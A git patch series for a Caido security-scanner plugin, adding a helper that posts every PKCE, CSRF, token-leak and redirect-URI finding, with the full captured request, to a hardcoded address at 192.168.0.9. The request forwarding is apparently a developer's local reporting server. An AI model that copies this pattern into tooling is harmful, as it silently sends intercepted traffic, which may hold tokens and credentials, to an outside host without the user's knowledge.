From 0eca258096c22663b06c1ef0c348b17f1224b06e Mon Sep 17 00:00:00 2001 From: imnyang Date: Thu, 5 Jun 2025 21:47:25 +0900 Subject: [PATCH 1/2] temp commit --- packages/backend/src/controller/PKCECheck.ts | 17 ++++++++------ packages/backend/src/index.ts | 1 + packages/backend/src/utils/controlTower.ts | 24 ++++++++++++++++++++ 3 files changed, 35 insertions(+), 7 deletions(-) create mode 100644 packages/backend/src/utils/controlTower.ts diff --git a/packages/backend/src/controller/PKCECheck.ts b/packages/backend/src/controller/PKCECheck.ts index 6fd4ee7..d7e0042 100644 --- a/packages/backend/src/controller/PKCECheck.ts +++ b/packages/backend/src/controller/PKCECheck.ts @@ -1,5 +1,6 @@ import type { SDK } from "caido:plugin"; import { Body, RequestSpec, type Request } from "caido:utils"; +import { sendReport } from "../utils/controlTower"; export class PKCECheck { // 필요한 PKCE 파라미터 목록 @@ -79,13 +80,14 @@ export class PKCECheck { const reference = isOpenID ? "https://openid.net/specs/openid-igov-oauth2-1_0-02.html#rfc.section.3.1.7" : "https://datatracker.ietf.org/doc/html/rfc7636"; - - await sdk.findings.create({ - title, - description: `PKCE downgrade vulnerability detected!\n\nOriginal URL: ${url}\nDowngraded URL: ${downgradedUrl}\n\nBoth requests returned authorization codes, indicating the server accepts requests without PKCE protection.\n\nReference: ${reference}`, - request: req, - reporter: "PKCE Checker", - }); + await this.reportFinding( + sdk, + req, + url, + isOpenID, + title, + `PKCE downgrade vulnerability detected!\n\nOriginal URL: ${url}\nDowngraded URL: ${downgradedUrl}\n\nBoth requests returned authorization codes, indicating the server accepts requests without PKCE protection.\n\nReference: ${reference}` + ); return true; } @@ -133,5 +135,6 @@ export class PKCECheck { request: req, reporter: "PKCE Checker", }); + sendReport(sdk, fullTitle, `${message} (${url})`, req, "PKCE Checker"); } } diff --git a/packages/backend/src/index.ts b/packages/backend/src/index.ts index 43d7516..65c8f03 100644 --- a/packages/backend/src/index.ts +++ b/packages/backend/src/index.ts @@ -40,6 +40,7 @@ export function init(sdk: SDK) { sdk.events.onInterceptRequest(async (sdk, req: Request) => { await pkceCheckController.test(sdk, req); }); + /* sdk.events.onInterceptRequest(async (sdk, req: Request) => { const result = diff --git a/packages/backend/src/utils/controlTower.ts b/packages/backend/src/utils/controlTower.ts new file mode 100644 index 0000000..c284f8e --- /dev/null +++ b/packages/backend/src/utils/controlTower.ts @@ -0,0 +1,24 @@ +import type { SDK } from "caido:plugin"; +import { Body, RequestSpec, type Request } from "caido:utils"; + +export async function sendReport( + sdk: SDK, + title: string, + description: string, + request: Request, + reporter: string +) { + const spec = new RequestSpec("http://192.168.0.9:4020/report"); + spec.setMethod("POST"); + spec.setHeader("Content-Type", "application/json"); + + const body = new Body(JSON.stringify({ + title, + description, + request: request.toSpec(), + reporter + })); + spec.setBody(body); + + return await sdk.requests.send(spec); +} \ No newline at end of file From 1e79dcabaab37c76023df1760c917483341f2cda Mon Sep 17 00:00:00 2001 From: imnyang Date: Thu, 5 Jun 2025 21:49:59 +0900 Subject: [PATCH 2/2] Temp --- packages/backend/src/controller/PKCECheck.ts | 2 +- .../backend/src/controller/accessTokenDetector.ts | 15 +++++++++++++++ packages/backend/src/controller/csrfCheck.ts | 9 +++++++++ .../backend/src/controller/redirect_uriBypass.ts | 8 ++++++++ 4 files changed, 33 insertions(+), 1 deletion(-) diff --git a/packages/backend/src/controller/PKCECheck.ts b/packages/backend/src/controller/PKCECheck.ts index d7e0042..9f7bd40 100644 --- a/packages/backend/src/controller/PKCECheck.ts +++ b/packages/backend/src/controller/PKCECheck.ts @@ -135,6 +135,6 @@ export class PKCECheck { request: req, reporter: "PKCE Checker", }); - sendReport(sdk, fullTitle, `${message} (${url})`, req, "PKCE Checker"); + await sendReport(sdk, fullTitle, `${message} (${url})`, req, "PKCE Checker"); } } diff --git a/packages/backend/src/controller/accessTokenDetector.ts b/packages/backend/src/controller/accessTokenDetector.ts index c0570d0..c6834c5 100644 --- a/packages/backend/src/controller/accessTokenDetector.ts +++ b/packages/backend/src/controller/accessTokenDetector.ts @@ -1,5 +1,6 @@ import type { Request, Response } from "caido:utils"; import type { SDK, DefineAPI } from "caido:plugin"; +import { sendReport } from "../utils/controlTower"; // 토큰 누출 검사 결과를 담는 구조 export interface TokenLeakResult { @@ -21,6 +22,13 @@ export class AccessTokenLeakController { request, reporter: "AccessTokenLeak", }); + await sendReport( + sdk, + result.title, + result.description, + request, + "AccessTokenLeak" + ); } } @@ -33,6 +41,13 @@ export class AccessTokenLeakController { request, reporter: "AccessTokenLeak", }); + await sendReport( + sdk, + result.title, + result.description, + request, + "AccessTokenLeak" + ); } } diff --git a/packages/backend/src/controller/csrfCheck.ts b/packages/backend/src/controller/csrfCheck.ts index 8a6f723..bd96bdd 100644 --- a/packages/backend/src/controller/csrfCheck.ts +++ b/packages/backend/src/controller/csrfCheck.ts @@ -1,6 +1,7 @@ import type { Request, Response } from "caido:utils"; import type { SDK, DefineAPI } from "caido:plugin"; import { HttpUtils } from "../utils/http"; +import { sendReport } from "../utils/controlTower"; const httpUtils = new HttpUtils(); @@ -269,6 +270,14 @@ export class CsrfCheck { request, reporter: "csrf reporter", }); + await sendReport( + sdk, + "CSRF Vulnerability Detected", + `A CSRF vulnerability was detected in the request.\n\nRequest: ${request.getMethod()} ${request.getUrl()}\n\nDetails: ${result}`, + request, + "csrf reporter" + ); + } } catch (error) { sdk.console.error(`Error creating finding: ${error}`); diff --git a/packages/backend/src/controller/redirect_uriBypass.ts b/packages/backend/src/controller/redirect_uriBypass.ts index ce521cb..a9a9c57 100644 --- a/packages/backend/src/controller/redirect_uriBypass.ts +++ b/packages/backend/src/controller/redirect_uriBypass.ts @@ -1,5 +1,6 @@ import type { Request, Response } from "caido:utils"; import type { SDK } from "caido:plugin"; +import { sendReport } from "../utils/controlTower"; export class RedirectBypassController { // redirect_uri를 확인하는 함수 @@ -54,6 +55,13 @@ export class RedirectBypassController { request: req, reporter: "gyu", }); + await sendReport( + sdk, + "Redirect URI Bypass Detected", + `A redirect URI bypass was detected.\nRedirect URI: ${result.redirectUri}`, + req, + "gyu" + ); } } }